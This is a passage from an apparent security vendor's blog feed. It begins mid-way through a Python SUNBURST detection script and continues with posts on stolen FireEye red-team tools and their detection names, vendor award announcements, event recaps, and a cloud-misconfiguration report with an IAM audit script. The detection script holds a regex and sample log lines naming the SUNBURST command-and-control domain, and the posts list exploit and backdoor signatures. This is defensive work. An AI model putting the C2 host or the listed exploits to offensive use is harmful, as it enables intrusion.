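C2_HOST_RE = re.compile(r"(?:^|[^a-z0-9.-])((?:[a-z0-9-]+\.)*avsvmcloud\.com)\b", re.I)

# Constructed log lines (hosts and DGA-style labels are made up). Lines 1 and 4 should hit.
SAMPLE_LOG = """\
2020-12-14T03:12:07Z orion01 dns query A k3adn4e02n7m4h6z4q.appsync-api.eu-west-1.avsvmcloud.com
2020-12-14T03:12:09Z orion01 proxy GET https://updates.example.com/orion/hotfix.msp
2020-12-14T03:15:40Z orion01 dns query A www.notavsvmcloud.com
2020-12-14T03:20:01Z orion01 proxy CONNECT g15cbg6a57jk2ba1d9ke.appsync-api.us-east-1.avsvmcloud.com:443
""".splitlines()

def md5_of(path):
    """MD5 of a file, streamed so large binaries stay out of memory."""
    digest = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()

def find_sunburst_artifacts(root, known_md5=SUNBURST_DLL_MD5):
    """Walk `root`; return (path, reason) pairs for step 1 of the advisory."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            if name.lower() == SUNBURST_DLL_NAME:
                digest = md5_of(path)
                if digest in known_md5:
                    hits.append((str(path), f"known SUNBURST md5 {digest}"))
                else:  # not a listed build: YARA-scan it, but not an IOC by itself
                    hits.append((str(path), f"unlisted build md5 {digest}; YARA-scan it"))
            elif tuple(p.lower() for p in path.parts[-3:]) == TEARDROP_PATH_TAIL:
                hits.append((str(path), "TEARDROP drop location"))
    return hits

def find_c2_beacons(log_lines):
    """Return (line_no, host) for every line naming an avsvmcloud.com host."""
    beacons = []
    for line_no, line in enumerate(log_lines, 1):
        match = C2_HOST_RE.search(line)
        if match:
            beacons.append((line_no, match.group(1).lower()))
    return beacons

def run_demo():
    """Build a constructed tree in a temp dir and run both checks. The placeholder
    DLL's own MD5 is passed as a "known" hash on the second pass because no real
    SUNBURST sample is embedded here."""
    with tempfile.TemporaryDirectory() as base:
        root = Path(base)
        dll = root / "Orion" / "SolarWinds.Orion.Core.BusinessLayer.dll"
        dll.parent.mkdir()
        dll.write_bytes(b"constructed placeholder, not an Orion build")
        drop = root / "Windows" / "SysWOW64" / "netsetupsvc.dll"
        drop.parent.mkdir(parents=True)
        drop.write_bytes(b"constructed placeholder")
        (root / "readme.txt").write_text("benign file, must not be reported")
        unlisted = find_sunburst_artifacts(root)  # against the real hash list
        matched = find_sunburst_artifacts(root, known_md5={md5_of(dll)})
    return {
        "unlisted": sorted(reason for _, reason in unlisted),
        "matched": sorted(reason for _, reason in matched),
        "beacons": find_c2_beacons(SAMPLE_LOG),
    }

if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

Point find_sunburst_artifacts at the Orion install root and the system drive of each SolarWinds server, and feed find_c2_beacons your proxy or DNS logs for those hosts. A single avsvmcloud.com hit from a server is enough to start the isolation and credential-reset steps above; a hash match confirms the backdoored build, while an unlisted hash only tells you to run the YARA rules.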
Many of these tools exploit known remote code execution (RCE) vulnerabilities across products commonly found in enterprise networks, such as legacy VPN products and several Microsoft applications. A full list of CVEs can be found here. Regardless of whether these tools may or may not be abused by an adversary in the future, it is important to ensure detection of any usage of them and to minimize the potential damage.

What can you do to protect yourself?

- Ensure that your users always have the Zscaler Client Connector running, so that their traffic is inspected and covered against these exploits.
- We highly recommend installing the latest security updates for the products affected by these CVEs. It is equally important to keep security software updated.
- Remote Desktop access should always be restricted, or turned off if not in use.
- As always, avoid opening suspicious emails containing attachments or links from unknown sources.
- Disable macros in Microsoft Office applications, and do not enable them unless it is essential to do so.
- Enable multi-factor authentication (MFA) across both business and personal email accounts to thwart most credential-harvesting attacks.

Zscaler coverage

Zscaler leveraged the countermeasures published by FireEye and validated that protection is already available for the majority of the vulnerabilities listed. Enhanced protection has been added wherever necessary across multiple layers of the Zscaler security platform.
Below are the threat names of the existing detections:

Advanced threat protection
- Win32.Exploit.CVE-2016-0167
- Win32.Exploit.CVE-2017-11774
- HTML.Exploit.CVE-2018-13379
- HTML.Exploit.CVE-2018-15961
- Win32.Exploit.CVE-2019-0604
- Win32.Exploit.CVE-2019-0708
- HTML.Exploit.CVE-2020-11510
- HTML.Exploit.CVE-2020-11580
- Linux.Exploit.CVE-2019-19781
- HTML.Exploit.CVE-2019-8394
- Win32.Exploit.CVE-2020-0688
- HTML.Exploit.CVE-2020-10189
- Win64.Exploit.CVE-2020-1472
- Win32.Exploit.CVE-2020-1472
- Win32.Backdoor.GoRAT
- VBS.Dropper.DNSExfiltration
- Win64.Backdoor.CobaltStrike
- Win32.Backdoor.BEACON

Malware protection
- Win32.Trojan.Heracles
- Win32.Trojan.LodKatz
- Win32.Trojan.Razy
- Win32.Trojan.Usru
- Win32.Downloader.CobaltStrike

The full list of threat names that detect abuse of FireEye's red team tools can be seen here. Details related to these threat signatures can be found in the Zscaler Threat Library.

Advanced Cloud Sandbox

We have ensured that Zscaler Cloud Sandbox flags these red team tools. As always, Cloud Sandbox plays a critical role in blocking any custom variants that may be developed from the stolen tools. The Zscaler ThreatLabZ team is also actively monitoring abuse attempts involving these red team tools and will ensure coverage for newer IOCs as they are discovered.

Wed, 09 Dec 2020 14:00:00 -0800 Amit Banker

Zscaler is the ONLY Leader in the Magic Quadrant

I am thrilled about the massive milestone Zscaler has achieved this week with the 2020 Gartner Magic Quadrant for Secure Web Gateways. It is an achievement every entrepreneur dreams of. It starts with the moment when you realize a fundamental change is about to reshape the world. And as entrepreneurs and visionaries, you tie that to a shift in the very basis of how certain capabilities were built or necessitated. It is a long road from there...from realization to implementation, and then an even longer road of execution to show and gain the confidence of the marketplace.
Ten years in, it is amazing to see how well the Gartner Magic Quadrant demonstrates that journey. Our first year in the Magic Quadrant was 2011. The market was saturated with numerous vendors, with five in the Leaders quadrant alone. SWG was largely URL filtering and antivirus. However, everyone knew that as internet usage increased, SWG would have to expand to become the DMZ of choice for most organizations, and all of this was expected to be done on appliances in a host of shapes and sizes. Peter Firstbrook and Lawrence Orans had realized that the future was cloud, but it was only a visionary idea. I remember flying with Jay to meet Peter in a small frozen town in Canada to whiteboard ideas for an advisory day, and the many conversations with Lawrence in Connecticut over the future of networking. At the time, the Magic Quadrant questionnaire had fewer than five questions (out of 100+) that asked about a cloud form factor.

Propelled by Jay’s extraordinary vision and conviction, Zscaler entered that world with a bold, one-of-a-kind born-in-the-cloud product portfolio that rivaled the best appliances. In the very first year, Zscaler secured a position in the Magic Quadrant as the furthest right on the vision axis, a position Zscaler has proudly continued to own ever since. A new entrant can never beat legacy vendors for revenue or execution on day one. But a new entrant wins a market only if it has better vision and stronger conviction about the future than everyone else. Otherwise, it is only a “me too.”

Over the years, our conviction was tested many times. For a company that was started in one of the worst recessions in the U.S., the journey was definitely not a cakewalk. As cloud, Microsoft Office 365, and mobility caught on, the need for a cloud form factor to protect employees became obvious. At the same time, the growth of SaaS, IaaS, and PaaS made it critical for the SWG to become the focal point of network protection.
Clear trends like SSL everywhere meant the only relevant point for network protection is the proxy that can inspect all SSL traffic. This resulted in the SWG definition subsuming or adding many previously independent functions (with the Magic Quadrant questionnaire reflecting this change):

- Coverage for all ports and protocols (Cloud Firewall)
- Advanced malware detection with IPS, sandboxing, machine learning, and more
- Data loss prevention and CASB
- Coverage for handheld form factors (Android and iOS)
- Remote browser isolation technologies
- Zero trust

As the market adopted this change, the Magic Quadrant has clearly reflected the vendors that kept up and were recognized not only by Gartner for vision, but also by the market at large for execution. Through our early years, industry visionaries, including Larry Biagini at GE, saw the need for a new way to ensure the security of their massive organizations. The same realization was happening all over the world across organizations in every vertical. These early customers shaped the outcome of what the SWG needed to become. Each year, as SWG became more complex and the importance of the cloud grew, the old leaders started to fall away. Each year, Gartner continued to push clear guidance that cloud was the future, to the point that two years ago the Magic Quadrant questionnaire had 90 percent of its questions focused on the cloud form factor. What a shift, and kudos to the Gartner analysts for keeping their ears to the ground and staying one step ahead to guide the market.

This year’s pandemic brought the changes Gartner has been espousing into sharp focus. Enterprises that had adopted new approaches (cloud-delivered security, zero trust, CASB, digital experience monitoring) were positioned to quickly enable their employees to work securely and remotely.
Those companies that were relying on legacy technologies faced an uphill battle to scale for a fully remote workforce (on unmanaged devices), provide secure access to private apps, and protect data. It is with great pride that we see the Magic Quadrant released this week demonstrating Zscaler’s conviction and hard work paying off. We are the only Leader in the most important security product family that is subsuming all of the past network-based defenses. While we wholeheartedly embrace our role in creating innovative, “disruptive” technology, we’ve always measured our success by that of our customers, who have been keeping the world working, literally. They’re running multinational corporations with their employees safely at home. They’re running financial institutions, government agencies, healthcare systems, energy infrastructure, and much more. We’re immensely proud to serve thousands of organizations around the world and that they trust us to help them meet the challenges of the day while keeping their lifeblood—people, systems, and data—accessible and secure. Customer obsession is a core value at Zscaler, and while we will all spend a moment reveling in the 2020 Gartner Magic Quadrant, we will quickly get back to our work of empowering customers to transform securely to the digital future—no matter what it may bring. That’s the real prize. Please read the blog by Jay Chaudhry in which he responds to 10 years of Gartner Magic Quadrant leadership and this year’s position as the only Leader. And be sure to download your free copy of the Gartner report. Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. 
Gartner disclaims all warranties, express or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose. This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Zscaler. Gartner Magic Quadrant for Secure Web Gateways, Lawrence Orans, John Watts, 8th December 2020.
Fri, 11 Dec 2020 12:55:22 -0800 Dr. Manoj Apte
Zscaler: The Only Gartner Magic Quadrant Leader for Secure Web Gateways, 2020
I am truly humbled to share that Zscaler has been named the only leader in the 2020 Gartner Magic Quadrant for Secure Web Gateways, cementing 10 consecutive years of being recognized as a Leader. In addition to being this year’s only leader, Zscaler has been positioned the furthest overall in both “Ability to Execute” and “Completeness of Vision.” This achievement wouldn't have been possible without the progressive leaders who have embraced change as an opportunity to gain a competitive advantage, the amazing partners that have joined us on our mission, and of course, our Zscaler family, whose passion and hard work continues to inspire me. We founded Zscaler with the certainty that digital transformation would change entire industries, unlocking productivity gains and empowering organizations to become more agile, intelligent, and resilient. We had conviction that traditional approaches to network security would become irrelevant as users went mobile and applications moved off the network into the cloud, and legacy IT infrastructure was an inhibitor to transformation. We realized that effective security and data protection required SSL inspection at scale, and true cyber risk reduction meant eliminating your attack surface. Today, we see a massive acceleration in what we imagined more than a decade ago: the cloud-first enterprise is now a reality.
When all that’s needed to run your business is a laptop or phone and an internet connection, the very backbone of networking and security must transform. We believe the Gartner Magic Quadrant highlights this fundamental shift from point solutions to a best-of-breed platform for better security and IT simplicity, which can only be delivered as part of a cloud-native proxy architecture. Through the Zscaler Zero Trust Exchange, we continue to deliver innovations that push the definition of the Secure Web Gateways category further than anyone thought possible, with Gartner highlighting:
How our cloud-native proxy architecture enables us to apply malware detection to all content, including SSL/TLS traffic
The addition of inline CASB for cloud application discovery and control, threat prevention and DLP integration, including adding API integration with popular SaaS providers to extend DLP to data-at-rest
Our integration of Appsulate technology into Zscaler Internet Access (ZIA) for remote browser isolation
Zscaler’s expansion into CSPM and digital experience monitoring (Zscaler Digital Experience)
Each new capability further reinforces the power of our platform to enable secure digital transformation, integrating all key security capabilities needed for the cloud-first enterprise, including an industry-leading SASE framework. As always, our first priority is to serve our customers, with each new innovation designed to support them on their transformation journey. As a result, our momentum continues to accelerate, and we are proud to serve more than 4,500 customers in 185 countries, including more than 450 of Forbes Global 2000 organizations. As historic numbers of organizations embrace digital transformation, the Zero Trust Exchange is a secure investment for the future. This past decade has been the journey of a lifetime, and we couldn’t be prouder to have been recognized again by Gartner.
To all of our customers, partners, and employees - I want to offer my sincere gratitude for your trust and support. I also want to extend my special appreciation to the forward-thinking leaders at Gartner, who question the status quo and push organizations to create highly differentiated, competitive offerings. Without their support, innovative companies like Zscaler would have a much harder time disrupting legacy technology. Over the years, I’ve had the privilege of working with Lawrence Orans, Peter Firstbrook, Neil McDonald, and many other thought-provoking Gartner analysts, whose conviction in a cloud-native future helped inspire me to keep expanding and growing the Zscaler platform. Ten years ago, I remember drawing my early vision for the Zscaler Zero Trust Exchange on a napkin over lunch with Peter in Thornbury, Ontario, and all the years of feedback with the Gartner team have continued to clarify and strengthen our offerings. As secure digital transformation accelerates, I know that Zscaler is just getting started. We invite you to download a complimentary copy of the 2020 Gartner Magic Quadrant Report for Secure Web Gateways here. Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, express or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose. This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Zscaler. Gartner Magic Quadrant for Secure Web Gateways, Lawrence Orans, John Watts, 8th December 2020. 
Fri, 11 Dec 2020 09:06:15 -0800 Jay Chaudhry
Zenith Live 2020 EMEA Day Two Highlights
This post originally appeared on LinkedIn.
That’s a wrap for day two of Zenith Live 2020 for the EMEA region. It’s been two days of compelling secure digital transformation customer journeys, architectural deep-dives, and the latest product and service innovations from Zscaler. Yes, things looked a little different this year, as every session moved online (and was made available for free). But going virtual only made the premier global cloud summit better, as every seat was in the front row. (Plus, I watched from the comfort of my couch.) Below, some of my day-two highlights. Like day one yesterday, we began day two of Zenith Live 2020 with some exciting product announcements from Zscaler President and CTO Amit Sinha, whose main-stage presentation was titled “Cyberthreats and Cloud Protection Innovations.” He shared details (and a demo) of Zscaler’s new Cloud Protection service that secures enterprise apps and workloads. He also talked about Zscaler ZDX, a feature that monitors performance, enabling enterprise IT leaders to measure, then optimize user experience. Amit introduced Reckitt Benckiser (RB) Director of Enterprise Architecture John Dawes, who has put ZDX into practice at the U.K.-based consumer goods multinational. John described how RB used Zscaler Private Access (ZPA) to enable remote work for its employees when COVID hit, and then how they’ve improved user experience for this new way of work. “ZDX has given us some great early insights,” said John. “We've identified some regional Office 365 issues, and on more than one occasion we've encouraged our colleagues to prioritize their own device on their home Wi-Fi network so Microsoft Teams works better." Following the product innovations session was an engaging “Voice-of-the-Customer” discussion on security transformation.
Zscaler CISO and VP of Security Research Deepen Desai spoke with two IT leaders from shipping firm CMA CGM: Group CISO Michael Perrino and IT Security Architect Sebastien Lemieux. The two discussed the French shipping company’s secure digital transformation, and how they led the move from legacy security to a cloud-based zero trust architecture to protect 110,000 employees across 160 countries, 755 working locations, 750 warehouses, and almost 500 vessels. They also shared the dramatic story of how CMA CGM deployed ZPA to 27,000 customers in 48 hours to mitigate a ransomware attack in progress. In the sincere words of Microsoft Identity Division CVP Alex Simons, “Microsoft and Zscaler are partnering to help [customers] realize a true Zero Trust security model.” Alex spoke on the main stage, and talked about the “new world,” one that “needs a new philosophy for security.” He introduced Gerold Nagel, DB Schenker’s SVP of Global Infrastructure Services, who talked about the German logistics firm’s “cloud-first strategy,” an approach he described as “the key enabler for our digital transformation.” Gerold credited DB Schenker’s Microsoft/Zscaler Zero Trust Cloud Model for the company’s recent accelerated shift to remote work: “This is not only a future-proof cloud topology,” he explained, “but it actually helped us implement a seamless business-continuity solution in the face of the pandemic.” I particularly enjoyed our day-two keynote. Journalist and author Andy Greenberg shared his experience tracking Sandworm, a Russian state-sponsored organization responsible for cyber attacks on Ukraine’s power infrastructure and on the 2018 Olympic Games. The cyber-terrorist group was also behind the catastrophic deployment of the NotPetya malware, which impacted major organizations around the globe. One of many interesting points he made that we can learn from: Ukraine was uniquely positioned to respond to a cyber attack.
The power companies were staffed with operations personnel who could quickly get out to remote locations to turn the power back on. That simple planning -- intentional or not -- helped minimize collateral damage from the attack. I had a busy day sharing insights from our customers and partners. I had the pleasure to discuss with Siemens’ Anthony Atherton how to secure OT and IoT workloads using the Zscaler platform. We showed together how Zscaler and Siemens are building new ways of working to ensure the protection of OT platforms for the enterprise. I then discussed the “art of the possible” in transformation with Sandvik’s Sebastian Kemi and Takeda’s Thomas Likas. Finally, I was also lucky enough to share how Zscaler can help companies understand what their attack surface is, with the Zscaler Attack Surface Tool. After two days of engaging virtual sessions at Zenith Live 2020, I’m already looking forward to Zenith Live 2021 (which I fully expect will be an in-person event!). If you weren’t able to join this week, you can still attend: Visit ZenithLive for more information, and to register to access recordings of this week’s sessions.
Thu, 10 Dec 2020 09:56:08 -0800 Nathan Howe
Zenith Live 2020 EMEA Day One Wrap-Up
This post originally appeared on LinkedIn.
Today marked the start of Zenith Live 2020 for the EMEA region. Zenith Live is the premier global cloud summit, and this year it has gone virtual. For the first time, all sessions have been made available online and for free. This year’s theme is “Beyond Limits,” and day one has certainly gone beyond the limits of my expectations. I wanted to share a few highlights from the main stage: The day began with an energetic keynote presentation from Zscaler CEO Jay Chaudhry. He looked forward, and one of his “bolder” visions for the future is that network security as we know it is dead.
Jay described the global adaptation to a new way of work and presented an excellent architectural overview of the Zscaler Zero Trust Exchange and Zscaler’s new Cloud Protection services. He described these as “Holistic Cloud Security.” Jay provided some perspective, offering a sincere acknowledgement of the hard work and sacrifices of front-line workers, who inspire all of us seeking to preserve business continuity. With this, he also referenced the “extraordinary” accomplishments of two European companies who truly went beyond limits in response to the pandemic. Using Zscaler Private Access (ZPA), Essen, Germany-based DB Schenker moved 20,000+ employees to remote work in two weeks. Similarly, Siemens enabled 300,000 workers to work from anywhere in just three weeks. The responsibility for enabling these accomplishments falls to the stewards of the Zscaler Zero Trust Exchange platform, and Jay brought on Head of Operations Misha Kuperman, who described in detail how Zscaler adjusted to handle increased traffic loads brought on by the global shift to remote work. Next up on the virtual main stage were Zscaler President and CTO Amit Sinha and CIO Patrick Foxhoven, who gave an update on several new Zscaler product innovations. Particularly interesting was how Zscaler is integrating machine-learning technology into its behavioural analysis to deliver better security and user experience. Amit used a great real-world example of Zscaler AI used for advanced anomaly detection to flag a potential data-exfiltration risk. He also introduced Jairo Orea, Global CISO with Kimberly-Clark, who described how his company was able to switch to secure remote work in just two hours with Zscaler. Jay returned to speak with several IT leaders at Siemens: CIO Hanna Hennig, Head of IT Infrastructure Markus Holzheimer, VP of IT Strategy & Governance Frederik Janssen, and Head of DEC Anthony Atherton. 
Together, this group successfully guided the company’s operations through the recent pandemic. Their innovations are taking IoT/OT security to new levels using a zero-trust architecture, an especially important strategy for an organization with such advanced manufacturing operations. Another highlight was my colleague Kavitha Mariappan’s interview with Captain Scott Kelly. He shared his experiences as a U.S. Navy fighter pilot and astronaut, and described in incredible detail what it’s like to pilot a rocket. The example he set to go beyond limits can motivate all of us. (Also, his description of reentry into the earth’s atmosphere was fascinating.) This year we invited IT leaders from Technip FMC, Johnson Controls, BT, and PepsiCo to join Zscaler Senior Director of Transformation Strategy Pam Kubiatowski for the session “Women in IT: Confidence and Collaboration Bring IT Career Success.” They shared their unique perspectives on getting ahead and offered advice for other leaders. Some sage counsel from former PepsiCo CIO Jody Davids: Don’t take it personally, develop resilience, and “when in doubt, act.” Off the main sessions, experts from Zscaler, Zscaler partners, and even Zscaler customers led breakouts and training covering everything from architectural overviews to product updates to in-depth hands-on demos. Some of the more popular topics among European attendees included a technical deep-dive on the new Zscaler Client Connector, an overview of Microsoft 365 deployment best practices, and a new-features update on ZPA. In case you missed today’s sessions, don’t worry! Recordings will be available soon! And Zenith Live 2020 continues tomorrow at 8:00 AM GMT. I’m looking forward to hearing more details on new platform innovations from Amit and Patrick, as well as compelling customer journeys from CMA CGM, Sanofi, DB Schenker, Unilever, and others.
And I’m expecting a great keynote from Andy Greenberg, the noted journalist and author of Sandworm, who will share his investigative reporting into the shadowy cyber-terrorist group behind NotPetya.
Wed, 09 Dec 2020 08:35:57 -0800 Ismail Elmas
The 2020 State of Cloud (In)Security
Key findings
63% do not use multifactor authentication for cloud access
50% do not rotate access keys periodically
92% do not log access to cloud storage, eliminating the ability to conduct forensic analysis of an incident
26% of workloads expose SSH ports to the internet and 20% expose RDP
Public cloud has made possible previously unheard-of scale, performance, and agility for enterprises of all sizes. Development teams are getting new products and applications to production faster than ever before, accelerating digital transformation within their organizations. But cloud adoption hasn’t been without its speed bumps, not the least of which is security. Cloud vendors have dedicated enormous security resources to their platforms, yet barely a day goes by without news of another cloud security incident. Most of these incidents can be traced back to insecure use of cloud services rather than to security flaws in the services themselves. To take a look at the current state of public cloud security, the Zscaler ThreatLabZ team collected anonymous statistics from customers running hundreds of thousands of workloads in AWS, Azure, and Google Cloud Platform (GCP). We also sampled user and application settings from customers using Microsoft 365 (M365). In this post, we’ll talk about the findings at a high level. Future posts will dive deeper into cloud-based attacks observed by the ThreatLabZ team, the risk of certain types of cloud misconfigurations, and the appropriate mitigations to put into place to protect against security incidents.
Cloud security shared responsibility model
Cloud security and compliance is a shared responsibility between the cloud service provider (CSP) and the customer.
All CSPs advertise this split clearly: security “of” the cloud service is provided by the CSP, and security “in” the cloud service is the responsibility of the customer. The split of responsibilities varies based on the type of cloud service being used. In a SaaS application, such as M365 or Salesforce, the cloud vendor is responsible for the entirety of the application’s security, from the physical security through the operating system(s) and the application itself. In an IaaS platform deployment, however, the customer is responsible for quite a bit more of the security and configuration of the services. Often, this includes the application code and even the operating system. In all cases, it is the enterprise’s responsibility to ensure that its data is properly protected, whether it lives in an enterprise data center or in a public cloud environment.
Cloud security findings
Upon reviewing the data, we found that a broad range of widely reported security issues are still not adequately mitigated in most environments. Key areas of deficiencies include:
Lack of logging and monitoring
If there is a compromise or other security incident, the first place to look for information on the event is log files. Even without a security failure, robust logging can help you fully understand what’s going on in your cloud environment. CSP tools, such as AWS CloudTrail and Azure Monitor, can help ensure that you have this information when needed. But they only work when enabled. Our analysis found that nearly 20 percent of implementations did not have CloudTrail enabled, and more than half did not take steps to maintain their logging beyond the default 90 days.
Excessive permissions
Compromised credentials are to blame for the vast majority of breaches, so it’s no surprise that cloud access keys and credentials are a primary target for bad actors.
Regardless of the strength of your security, an attacker with the right credentials can walk right through the front door. Notable examples include Uber, where the personally identifiable information (PII) of 57 million users was leaked when attackers nabbed hardcoded AWS credentials from a GitHub repo, and Code Spaces, whose entire company assets were wiped out from AWS after a phishing incident. In our analysis, a high percentage of organizations neglected to use multifactor authentication and used hard-coded access keys that persist for far too long before they are rotated.
Storage and encryption
Publicly exposed cloud storage buckets have been the cause of a number of high-profile data exposures over the past several years. The L.A. Times, Tesla, the Republican Party, Verizon, and Dow Jones are but a few of the well-known organizations that have made this mistake. Despite the press coverage, cloud storage remains the most common area of cloud misconfiguration. Loose access policies, lack of encryption, policies that aren’t uniformly applied, and accessibility via unencrypted protocols are but a few of the most common issues.
Network security groups
Network security groups control the network connectivity of every service in a cloud deployment, acting like a network firewall. Unfortunately, this group represents the second-most widely observed area of misconfiguration after cloud storage. In some cases, these are the result of human error. In other cases, security groups are intentionally left open to facilitate connectivity or to avoid complexity. Externally exposed protocols such as Secure Shell (SSH) and Remote Desktop Protocol (RDP) are far too common and give attackers the ability to take over infected systems and move laterally within an organization’s cloud footprint.
Lack of logging and monitoring
In a typical cloud environment, gigabytes (GBs) of data are moving in and out all the time.
To fully understand what’s going on in your cloud environment you’ll need a robust logging and monitoring system in place. For example, AWS CloudTrail is a logging service that gathers information about API calls, actions, and changes within your AWS environment. CloudTrail logs contain critical information for audits and intrusion response. CloudTrail is enabled by default, and it logs all activities and events for 90 days. If you need more than 90 days, you’ll have to configure CloudTrail to deliver those events to an Amazon S3 bucket. AWS CloudWatch collects and tracks metrics, monitors log files, and deploys automated responses to common events in your environment.
Impact
In case of a compromise, logs are often the first source of information. They are a crucial part of incident response.
Prevention
Ensure CloudTrail/Azure Monitor is enabled (for master and provisioned accounts)
Persist logs to S3 buckets/Azure Storage and configure lifecycle management
Ensure S3 server-side encryption (at a minimum)
Statistics
Access logs were not enabled for 92 percent of S3 buckets
99 percent did not require server-side and in-transit encryption
18 percent had CloudTrail disabled
58 percent did not persist CloudTrail logs to S3
78 percent of S3 buckets did not have a lifecycle configuration
100 percent of EC2 instances did not have detailed monitoring enabled
No accounts had Azure Monitor alerts configured
Detailed diagnostics were not enabled for 89 percent of SQL databases or VMs on Azure
Excessive permissions
Impact
Access keys and credentials are usually the first target for adversaries. With these in hand, it doesn’t matter which security policies or firewall rules are in place — the attacker has access to the entire cloud account.
Examples
Code Spaces was compromised in 2014 when its console credentials were phished.
The adversaries wiped most of the company’s assets on AWS. [1]
PII of 57 million users was leaked from Uber in 2016 when attackers got access to hardcoded AWS credentials from a GitHub repository. [2]
Records belonging to 35 million customers of Malindo Air were leaked by former employees of a vendor who abused their access. [3]
Prevention
Multifactor Authentication (MFA)
Passwords are the predominant method for authentication to computing systems these days. It is important to choose a unique, non-guessable password for each system that is being used. It is impossible for users to generate and memorize such passwords for the hundreds of sites they use, so a second factor of authentication becomes all the more important. In our analysis of customer environments, we identified that a vast majority of the customers did not make use of either hardware- or software-based MFA.
Key rotation
Access keys in practice are the same as usernames and passwords, but used programmatically. Users do not treat these with the same precautions as passwords. They end up hard-coded in code, saved in plain text, and more. To limit the exposure of keys, it is necessary to rotate them periodically. Also, unused keys must be revoked.
Principle of least privilege
Do not use the “root” user. Create users with the specific privileges they’d need. Assign policies to groups, not users, to ensure consistency. Use roles (IAM roles, Azure RBAC) instead of long-term access keys.
Statistics
Access keys were not rotated periodically in 50 percent of environments, resulting in exposed keys being usable for long periods of time.
63 percent of AWS console IAM users didn’t use MFA.
In AWS accounts, 28 percent of access was through keys instead of roles or groups. (Roles ensure uniformity in access and the principle of least authority.)
84 percent assigned IAM policies to users instead of groups.
14 percent of IAM users were inactive.
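The MFA, key-rotation, root-user and inactive-user checks above can be run against an AWS IAM credential report. This is an added example, not code from the original post or from Zscaler; the report below is a constructed sample in the column layout of `aws iam get-credential-report`, and the 90-day thresholds are assumed policy values.

```python
"""Audit an AWS IAM credential report for the gaps the post lists: console
users without MFA, access keys left unrotated, the root user holding keys,
and users that are inactive but still hold credentials."""
import csv
import io
from datetime import datetime, timedelta, timezone

MAX_KEY_AGE_DAYS = 90     # assumed rotation policy (not a figure from the post)
INACTIVE_AFTER_DAYS = 90  # assumed: no login and no key use for this long

# Constructed sample in the column layout of `aws iam get-credential-report`
# (the real report also carries cert_* and *_last_used_region/service columns).
# Account ID and users are fictional.
SAMPLE_REPORT = """\
user,arn,user_creation_time,password_enabled,password_last_used,password_last_changed,password_next_rotation,mfa_active,access_key_1_active,access_key_1_last_rotated,access_key_1_last_used_date,access_key_2_active,access_key_2_last_rotated,access_key_2_last_used_date
<root_account>,arn:aws:iam::123456789012:root,2019-01-10T09:00:00+00:00,not_supported,2020-11-30T08:12:00+00:00,not_supported,not_supported,false,true,2019-01-10T09:05:00+00:00,2020-10-01T00:00:00+00:00,false,N/A,N/A
alice,arn:aws:iam::123456789012:user/alice,2020-02-01T10:00:00+00:00,true,2020-12-01T07:00:00+00:00,2020-02-01T10:00:00+00:00,N/A,true,true,2020-11-15T10:00:00+00:00,2020-12-01T07:30:00+00:00,false,N/A,N/A
bob,arn:aws:iam::123456789012:user/bob,2019-06-01T10:00:00+00:00,true,2020-12-02T07:00:00+00:00,2019-06-01T10:00:00+00:00,N/A,false,true,2019-06-01T10:00:00+00:00,2020-12-02T07:30:00+00:00,false,N/A,N/A
ci-deploy,arn:aws:iam::123456789012:user/ci-deploy,2020-01-05T10:00:00+00:00,false,N/A,N/A,N/A,false,true,2020-11-20T10:00:00+00:00,2020-12-02T01:00:00+00:00,false,N/A,N/A
old-contractor,arn:aws:iam::123456789012:user/old-contractor,2019-03-01T10:00:00+00:00,true,2020-04-01T07:00:00+00:00,2019-03-01T10:00:00+00:00,N/A,false,true,2019-03-01T10:00:00+00:00,2020-03-30T07:30:00+00:00,false,N/A,N/A
"""


def _parse_ts(value):
    """Timestamps are ISO 8601; N/A, no_information and not_supported mean 'never'."""
    if value in ("N/A", "no_information", "not_supported", ""):
        return None
    return datetime.fromisoformat(value)


def audit_credential_report(report_csv, now):
    """Return (user, finding) tuples for the controls the post calls out."""
    findings = []
    for row in csv.DictReader(io.StringIO(report_csv)):
        user = row["user"]
        is_root = user == "<root_account>"
        has_console = is_root or row["password_enabled"] == "true"
        # 1. Every console login (root included) must be protected by MFA.
        if has_console and row["mfa_active"] != "true":
            findings.append((user, "console access without MFA"))
        # 2. "Do not use the root user": root should hold no long-term keys.
        if is_root and "true" in (row["access_key_1_active"], row["access_key_2_active"]):
            findings.append((user, "root account has an active access key"))
        # 3. Active keys past the rotation threshold; collect last-use dates.
        last_used = [_parse_ts(row["password_last_used"])]
        for slot in ("1", "2"):
            if row[f"access_key_{slot}_active"] != "true":
                continue
            rotated = _parse_ts(row[f"access_key_{slot}_last_rotated"])
            if rotated and now - rotated > timedelta(days=MAX_KEY_AGE_DAYS):
                findings.append((user, f"access key {slot} not rotated for {(now - rotated).days} days"))
            last_used.append(_parse_ts(row[f"access_key_{slot}_last_used_date"]))
        # 4. Inactive users: no console login and no key use inside the window.
        recent = [t for t in last_used if t is not None]
        if not is_root and (not recent or now - max(recent) > timedelta(days=INACTIVE_AFTER_DAYS)):
            findings.append((user, "inactive user; revoke credentials"))
    return findings


def run_sample():
    """Audit the constructed report as of 8 Dec 2020."""
    return audit_credential_report(SAMPLE_REPORT, datetime(2020, 12, 8, tzinfo=timezone.utc))


if __name__ == "__main__":
    for user, finding in run_sample():
        print(f"{user}: {finding}")
```

Note that `ci-deploy` has no console password, so the MFA check does not apply to it; a programmatic user is instead caught by the rotation and inactivity checks.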
Storage and encryption
What
The most common misconfigurations still revolve around cloud storage buckets and the objects within, which pose a big confidentiality risk and make them the number-one target for data breaches. These misconfigurations encompass several commonly observed mistakes made while initializing and operationalizing the storage buckets and the contents within them, such as:
